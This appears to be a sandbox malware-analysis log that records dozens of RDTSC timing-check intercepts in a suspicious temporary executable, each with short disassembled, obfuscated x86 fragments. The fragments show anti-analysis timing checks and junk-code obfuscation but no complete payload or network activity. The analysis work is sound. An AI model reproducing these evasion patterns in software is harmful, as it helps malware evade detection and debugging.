Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A5641 second address: 8A56EA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBF8C4F2A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FBF8C4F2A51h 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007FBF8C4F2A55h 0x00000016 nop 0x00000017 mov ebx, eax 0x00000019 mov di, B760h 0x0000001d push dword ptr fs:[00000000h] 0x00000024 mov ebx, 3FA3155Dh 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007FBF8C4F2A48h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a mov bx, di 0x0000004d mov dword ptr [ebp+12460189h], edi 0x00000053 mov eax, dword ptr [ebp+122D0CCDh] 0x00000059 push FFFFFFFFh 0x0000005b push 00000000h 0x0000005d push edi 0x0000005e call 00007FBF8C4F2A48h 0x00000063 pop edi 0x00000064 mov dword ptr [esp+04h], edi 0x00000068 add dword ptr [esp+04h], 0000001Ah 0x00000070 inc edi 0x00000071 push edi 0x00000072 ret 0x00000073 pop edi 0x00000074 ret 0x00000075 mov dword ptr [ebp+122D32E5h], ebx 0x0000007b nop 0x0000007c push eax 0x0000007d push eax 0x0000007e push edx 0x0000007f pushad 0x00000080 popad 0x00000081 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A56EA second address: 8A56EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A76E0 second address: 8A76E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A76E4 second address: 8A76EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A877A second address: 8A877E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A98DC second address: 8A98E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A76EA second address: 8A76F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FBF8C4F2A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A877E second address: 8A8784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A8784 second address: 8A878A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A76F4 second address: 8A779C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2094h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e or dword ptr [ebp+122D1D90h], edi 0x00000014 call 00007FBF8C4F2092h 0x00000019 mov edi, dword ptr [ebp+122D32BDh] 0x0000001f pop ebx 0x00000020 push dword ptr fs:[00000000h] 0x00000027 push 00000000h 0x00000029 push ecx 0x0000002a call 00007FBF8C4F2088h 0x0000002f pop ecx 0x00000030 mov dword ptr [esp+04h], ecx 0x00000034 add dword ptr [esp+04h], 0000001Ah 0x0000003c inc ecx 0x0000003d push ecx 0x0000003e ret 0x0000003f pop ecx 0x00000040 ret 0x00000041 mov edi, esi 0x00000043 mov dword ptr fs:[00000000h], esp 0x0000004a push 00000000h 0x0000004c push edi 0x0000004d call 00007FBF8C4F2088h 0x00000052 pop edi 0x00000053 mov dword ptr [esp+04h], edi 0x00000057 add dword ptr [esp+04h], 0000001Bh 0x0000005f inc edi 0x00000060 push edi 0x00000061 ret 0x00000062 pop edi 0x00000063 ret 0x00000064 mov eax, dword ptr [ebp+122D01F1h] 0x0000006a mov edi, edx 0x0000006c push FFFFFFFFh 0x0000006e add edi, 27A23F2Eh 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a pop eax 0x0000007b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A779C second address: 8A77A2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8AB81F second address: 8AB824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8AB8BE second address: 8AB8C8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBF8C4F2A4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8AC855 second address: 8AC85F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FBF8C4F2086h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8AC85F second address: 8AC872 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007FBF8C4F2A48h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8AC872 second address: 8AC88B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF8C4F2094h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A36C7 second address: 8A36D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A36D2 second address: 8A3755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FBF8C4F2088h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 jnp 00007FBF8C4F2089h 0x00000029 mov di, ax 0x0000002c mov dword ptr [ebp+122D5711h], edi 0x00000032 push dword ptr fs:[00000000h] 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 mov eax, dword ptr [ebp+122D0279h] 0x00000046 push 00000000h 0x00000048 push ebx 0x00000049 call 00007FBF8C4F2088h 0x0000004e pop ebx 0x0000004f mov dword ptr [esp+04h], ebx 0x00000053 add dword ptr [esp+04h], 0000001Ah 0x0000005b inc ebx 0x0000005c push ebx 0x0000005d ret 0x0000005e pop ebx 0x0000005f ret 0x00000060 mov edi, esi 0x00000062 push FFFFFFFFh 0x00000064 movzx ebx, bx 0x00000067 nop 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007FBF8C4F208Ah 0x0000006f rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A3755 second address: 8A376F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBF8C4F2A4Ch 0x00000008 jp 00007FBF8C4F2A46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007FBF8C4F2A46h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A376F second address: 8A3781 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FBF8C4F2086h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 89226F second address: 8922B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007FBF8C4F2A56h 0x00000014 popad 0x00000015 pop esi 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push ecx 0x0000001b pushad 0x0000001c jnl 00007FBF8C4F2A46h 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 pop ecx 0x00000026 mov eax, dword ptr [eax] 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8922B4 second address: 8922BE instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8922BE second address: 8922F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e push esi 0x0000000f jmp 00007FBF8C4F2A54h 0x00000014 pop esi 0x00000015 js 00007FBF8C4F2A4Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8923E7 second address: 89241A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2093h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBF8C4F2099h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 89241A second address: 89243F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edi 0x0000000b add dword ptr [ebp+122D1A31h], eax 0x00000011 pop ecx 0x00000012 pop edi 0x00000013 lea eax, dword ptr [ebp+12485C62h] 0x00000019 mov cl, 62h 0x0000001b push eax 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f jo 00007FBF8C4F2A46h 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 89243F second address: 879CF3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FBF8C4F2088h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D1BFDh], ecx 0x0000002a call dword ptr [ebp+122D1C6Fh] 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 879CF3 second address: 879CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 879CF7 second address: 879D15 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBF8C4F2086h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jns 00007FBF8C4F2086h 0x00000015 popad 0x00000016 jl 00007FBF8C4F208Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8CDB99 second address: 8CDB9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8CDD06 second address: 8CDD0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8CDD0A second address: 8CDD10 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8CDD10 second address: 8CDD1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jng 00007FBF8C4F2086h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8CDD1D second address: 8CDD3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FBF8C4F2A4Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8CDD3A second address: 8CDD3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8CDD3E second address: 8CDD51 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBF8C4F2A46h 0x00000008 ja 00007FBF8C4F2A46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8CDE9D second address: 8CDEB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2098h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8CE11B second address: 8CE126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FBF8C4F2A46h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8CE126 second address: 8CE13F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FBF8C4F2093h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8CE409 second address: 8CE40D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8CE40D second address: 8CE411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8CE411 second address: 8CE417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8CE417 second address: 8CE41F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D4461 second address: 8D4479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF8C4F2A53h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D4479 second address: 8D447F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D447F second address: 8D44B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FBF8C4F2A46h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 push edx 0x00000013 jng 00007FBF8C4F2A46h 0x00000019 jmp 00007FBF8C4F2A4Ch 0x0000001e pop edx 0x0000001f jbe 00007FBF8C4F2A52h 0x00000025 jp 00007FBF8C4F2A46h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D2E79 second address: 8D2E8B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FBF8C4F2086h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D2E8B second address: 8D2EA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A4Bh 0x00000007 jns 00007FBF8C4F2A46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D313B second address: 8D3158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F2099h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D3158 second address: 8D3166 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FBF8C4F2A5Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D366C second address: 8D368F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 jng 00007FBF8C4F2086h 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBF8C4F208Bh 0x00000015 jl 00007FBF8C4F2088h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D3801 second address: 8D3831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F2A57h 0x00000009 popad 0x0000000a jmp 00007FBF8C4F2A4Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007FBF8C4F2A46h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D3831 second address: 8D384A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF8C4F2086h 0x00000008 jmp 00007FBF8C4F208Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D384A second address: 8D384E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D384E second address: 8D3854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D3854 second address: 8D385A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D385A second address: 8D3864 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBF8C4F2092h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D3864 second address: 8D386A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D3E26 second address: 8D3E30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FBF8C4F2086h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D3E30 second address: 8D3E34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D3E34 second address: 8D3E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FBF8C4F2086h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007FBF8C4F208Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D42E2 second address: 8D42E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D42E6 second address: 8D42F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FBF8C4F2086h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D42F6 second address: 8D42FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D2B8F second address: 8D2B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FBF8C4F2086h 0x0000000a jl 00007FBF8C4F2086h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D2B9F second address: 8D2BB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D92ED second address: 8D931C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2096h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c jc 00007FBF8C4F2086h 0x00000012 pop esi 0x00000013 jmp 00007FBF8C4F208Bh 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D931C second address: 8D9322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D9322 second address: 8D9326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D975F second address: 8D9763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D8CA4 second address: 8D8CB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F208Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D9B6A second address: 8D9B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D9B70 second address: 8D9B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D9B74 second address: 8D9B7E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBF8C4F2A46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8D9D09 second address: 8D9D5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF8C4F2097h 0x00000008 jng 00007FBF8C4F2086h 0x0000000e jmp 00007FBF8C4F2096h 0x00000013 popad 0x00000014 jmp 00007FBF8C4F2091h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e jbe 00007FBF8C4F2086h 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8DD0B6 second address: 8DD0BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8DD0BA second address: 8DD0C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8DE8C1 second address: 8DE8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F2A4Dh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c jbe 00007FBF8C4F2A60h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
